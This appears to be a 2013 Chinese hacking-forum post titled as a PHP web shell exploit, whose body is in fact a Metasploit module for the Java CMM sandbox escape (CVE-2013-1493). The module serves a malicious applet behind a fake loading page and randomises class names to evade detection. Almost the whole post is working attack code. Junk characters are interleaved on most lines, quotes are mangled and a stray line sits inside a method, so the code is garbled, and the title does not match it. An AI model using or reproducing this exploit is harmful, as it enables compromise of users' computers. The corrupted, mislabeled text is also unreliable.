找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2283|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##  r6 S$ e8 s% E% x. z. J

6 f( n2 Y3 |$ S$ c# This file is part of the Metasploit Framework and may be subject to7 R( Z. Q. z1 n1 L
# redistribution and commercial restrictions. Please see the Metasploit( l* C( J6 Q) Z
# web site for more information on licensing and terms of use.+ k7 h; Q1 C8 I9 Z4 h
# http://metasploit.com/# ]0 e- G( O# V* P) i3 P0 G
##. U$ J2 U, E+ @5 k$ ?2 }
require ‘msf/core’+ g* e  [6 l& z5 B( i, q
require ‘rex’* b( {/ H; N3 p7 v4 n
class Metasploit3 < Msf::Exploit::Remote
4 f6 ]# E- \8 Q* Q; B6 K! qRank = NormalRanking9 z; r7 a. p! A/ z
include Msf::Exploit::Remote::HttpServer::HTML( z0 C$ I" \$ C$ _
include Msf::Exploit::EXE. L4 w# U, N. _3 D' J
include Msf::Exploit::Remote::BrowserAutopwn7 {: F2 A4 b8 x% K' u* g6 J
autopwn_info({ :javascript => false })
: Y7 F3 i& z4 |' e* O& |" x" |def initialize( info = {} )! y7 T% R6 F" _  \
super( update_info( info,# S0 S% o0 D/ ?: S( c4 U
‘Name’ => ‘Java CMM Remote Code Execution’," P; ?- ?2 P8 c$ @' S
‘Description’ => %q{
3 L8 c( ^+ N! ?! a3 K  @+ \3 ^This module abuses the Color Management classes from a Java Applet to run
" J2 Q) u5 Z7 m5 Sarbitrary Java code outside of the sandbox as exploited in the wild in February) C$ H0 N& P% @" ~3 Q7 i
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
& i8 p  x2 J( Y$ ]and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
  E2 ^4 m3 V, C* f( o$ K0 ]systems. This exploit doesn’t bypass click-to-play, so the user must accept the java3 X; A) h" [' ]. a& z
warning in order to run the malicious applet.4 B. d# K  e1 [) M# T) I% k7 F1 i
},
+ z# q. T# ~# j6 R‘License’ => MSF_LICENSE," C3 ~- g0 r* a0 d! ^. f2 v, @
‘Author’ =>
6 V3 m& N; o7 ]; f'Unknown', # Vulnerability discovery and Exploit; X6 c( @, e3 d5 v( E  \
'juan vazquez' # Metasploit module (just ported the published exploit). ], `' C& C7 Y: k& a& k! X
],
, z/ i: {# P# C& Y% M‘References’ =>7 P2 Z' G, T/ u8 `( R
[
; J6 T2 ]# L  I4 I2 J/ T[ 'CVE', '2013-1493' ],) u6 V9 a6 N7 x6 N3 X* g0 B
[ 'OSVDB', '90737' ],9 Z1 x- a9 m0 u6 q3 [' S
[ 'BID', '58238' ],
' Y/ u; @$ y: i( u2 t[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],- U, w, n9 Z- Y
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 Y2 _& q, o) C[ 'URL', 'http://pastie.org/pastes/6581034' ]  r1 O4 j8 L, a6 O# \& T8 R) q
],0 m4 X5 z, O: Q5 z- c! P
‘Platform’ => [ 'win', 'java' ],( J' R7 Z+ E/ H* k
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },( }3 D- L3 k# `' j
‘Targets’ =>5 Q6 ?) ?) X" V6 q- \# u
[) N* f. j1 N/ K$ Y/ u& L3 _: ^
[ 'Generic (Java Payload)',
+ o: r# P/ p* R# v1 `- k9 f( E6 W{0 T6 V/ V' l( l7 J* F2 \
'Platform' => 'java',
! o* Q  U* E; o  _'Arch' => ARCH_JAVA" V! c9 z( c- ^4 Q
}
1 A; V& V/ C- _" s* q1 D6 }7 [+ |# ^],: D3 {3 i3 c! F( ~0 I- `
[ 'Windows x86 (Native Payload)',
2 A5 Q/ W# O* `" J1 p, ?" q6 f{4 l+ l% X: i/ Q" u
'Platform' => 'win',
+ w" L3 h; i- i1 \3 k2 I+ Q'Arch' => ARCH_X86- u. i& o  h- D) c- ~; e
}
+ Z" Q; [6 K6 S+ x9 G1 u* O2 ^# y/ J]
4 Y5 Y. G. P$ H9 b. x) _7 z9 H],
- L7 S1 L- _/ p$ _1 N& W/ g, B9 e‘‘DisclosureDate’ => ‘Mar 01 2013′
6 n& d( A, M  G, [/ L))' ?5 W& O9 Z' U1 W. h
end
, Q5 h4 n4 b* d7 ], _3 V8 K+ [def setup
( f1 E6 Y7 j( |/ _- Lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
2 Y4 E  U: ~" Q: m@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& D+ A1 w: A) D: J
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”), k8 i3 {! m* K( b* K  @
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 d' W6 i- k3 O0 r
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)1 d6 {( R" k1 Z6 u+ N. _) F; j
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
0 {: U# M" d6 T  i* x- Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
7 Q1 u! I. a) `/ F, G4 u, B& K@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! x! t( r0 C6 e4 W& J
@init_class_name = rand_text_alpha(“Init”.length)
) S( [# C. F# D6 r) H6 T3 Z& v# G@init_class.gsub!(“Init”, @init_class_name)8 u+ {. `5 m4 }( s" y! h, ?
super0 h/ l# e$ q% Y' ]
end
# b8 \/ b4 [+ L8 Hdef on_request_uri(cli, request)2 @8 u5 \5 @2 A0 O
print_status(“handling request for #{request.uri}”)
9 x" h9 ?0 P$ N" `) ^* h! [& o% ]' Acase request.uri' R) @4 I4 P  N
when /\.jar$/i
2 k. |1 T' C! cjar = payload.encoded_jar' w' a, q4 t- ]# g3 I
jar.add_file(“#{@init_class_name}.class”, @init_class); r& |$ e0 r1 _9 m; B
jar.add_file(“Leak.class”, @leak_class)
. H; Z+ k! v4 Ejar.add_file(“MyBufferedImage.class”, @buffered_image_class)& ^4 y0 u1 z  z: x& X: v1 W, D
jar.add_file(“MyColorSpace.class”, @color_space_class)* ~% f  y2 W0 ?) z2 H0 _+ F; c
DefaultTarget’ => 1,
' d9 P3 h* f5 C4 ~metasploit_str = rand_text_alpha(“metasploit”.length)
' l5 H+ {( m& @5 ?# upayload_str = rand_text_alpha(“payload”.length)
8 |9 @6 B% w8 S/ J2 m+ B* S1 fjar.entries.each { |entry|8 D4 d  A+ I4 d) t% N; M2 S5 [3 M9 n
entry.name.gsub!(“metasploit”, metasploit_str)/ j) G& ^. N9 Y0 H3 f0 v( _
entry.name.gsub!(“Payload”, payload_str)
6 O6 `8 V9 S# m1 F- y! Ventry.data = entry.data.gsub(“metasploit”, metasploit_str)  s6 g( z, u& p$ ^6 h
entry.data = entry.data.gsub(“Payload”, payload_str)
& E, L# O, {) r! D5 V* t}
, I( E. K; z- K# e3 ]jar.build_manifest6 |+ n8 ^/ {7 z/ |2 u  Z
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
  p" x) P  q7 d% o; I# rwhen /\/$/
; C+ h. ?4 t+ S0 Spayload = regenerate_payload(cli). h7 p9 C0 B. g5 O" @7 d
if not payload6 \, J! I& D% s6 |" w
print_error(“Failed to generate the payload.”)
; t- M/ \/ Y* Z4 ysend_not_found(cli)
1 e: i8 r+ y/ }/ |# r3 Freturn, O" u0 a" F1 c! r# r
end# g7 U0 e; s# X, M9 R# ^6 d8 n9 }& n
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })7 a( _0 V: i% L" T, A0 H9 `
else/ ]+ \/ w* }5 `5 t" \) E
send_redirect(cli, get_resource() + ‘/’, ”)
* Z" Z1 M% a5 M: Xend
- p, N/ {7 ~7 w; cend- X$ i# R0 F/ }$ O2 P
def generate_html; i9 x0 W9 e2 p: x0 Y: b" P
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
. {4 O# U/ [/ E5 Q* Y& N4 L$ v; |html += %Q|<body><center><p>Loading, Please Wait…</p></center>|( b2 ~1 R5 `% Z; ~8 K* `7 n2 S% M8 n
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
; n% E$ e4 q# ^/ e# xhtml += %Q|</applet></body></html>|# P/ R4 N2 b$ L( q- V% p" V( T
return html
9 G0 Z; X; y- `  L) X- m) Gend
# S) o% p; W) M9 U) p. P2 U/ [end
/ |* n, R% N) L& bend( j$ U. r; N6 t6 }/ S" x1 c( _* G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表